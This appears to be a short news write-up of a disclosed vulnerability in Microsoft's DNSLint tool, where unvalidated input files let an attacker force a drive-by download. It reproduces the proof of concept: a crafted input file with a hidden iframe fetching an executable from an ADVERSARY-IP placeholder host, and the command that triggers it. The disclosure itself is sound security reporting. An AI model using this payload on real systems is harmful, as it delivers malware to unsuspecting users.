The Microsoft DNSLint utility diagnoses Domain Name System (DNS) name lookup issues related to the IP addresses assigned to the web servers a browser reaches. It is not part of the basic Windows package but can be downloaded free of charge from Microsoft's website. A remote-access vulnerability graded 7.6 (critical) on the CVSS 3.0 scale was found to affect this utility, allowing forced drive-by downloads to take place.
The vulnerability arises because DNSLint does not validate domain names when it parses a DNS test file supplied with the "/ql" switch. If an end user runs the tool on such a file that contains script or binary references instead of the expected domain-name entries, the system is exposed to forced downloads. In that case an attacker can force the download of a malicious file that, once opened through the web browser, downloads and executes remote commands. The download is saved to a local location on the system and triggers a security prompt; because the file appears to come from a known location on the disk, the user may be inclined to let the executable proceed. Once the malicious file is granted that privilege, it can run whatever code the attacker intended and compromise the user's security and privacy.
John Page of hyp3rlinx has published a proof of concept that demonstrates this vulnerability, showing that an unintended file can be downloaded by the following command when a text file containing a script or binary reference is used in place of the domain name:
dnslint.exe /v /y /d "MALWARE-FILE" /s X.X.X.X /r "myreport"
In the context of the DNSLint utility, the following shows how the vulnerability can be exploited to introduce malware onto the system.
1) "dnslint-update.exe" on remote web server root dir.
2) Input file (servers.txt, used in step 3):
;This is a sample DNSLint input file
+This DNS server is called: dns1.cp.msft.net
<iframe//src="http://ADVERSARY-IP/dnslint-update.exe"//style="width:0;height:0;border:0;border:none;"></iframe>,a,r ;A record
X.X.X.X,ptr,r ;PTR record
test1,cname,r ;CNAME record
test2,mx,r ;MX record
3) dnslint.exe /ql servers.txt
The code above is reproduced without modification, as hyp3rlinx's rights to this content require. At the time of disclosure there does not appear to be any patch that resolves the issue. A CVE identifier has yet to be assigned to this vulnerability; Microsoft is expected to identify and document it in its official security bulletin on the matter.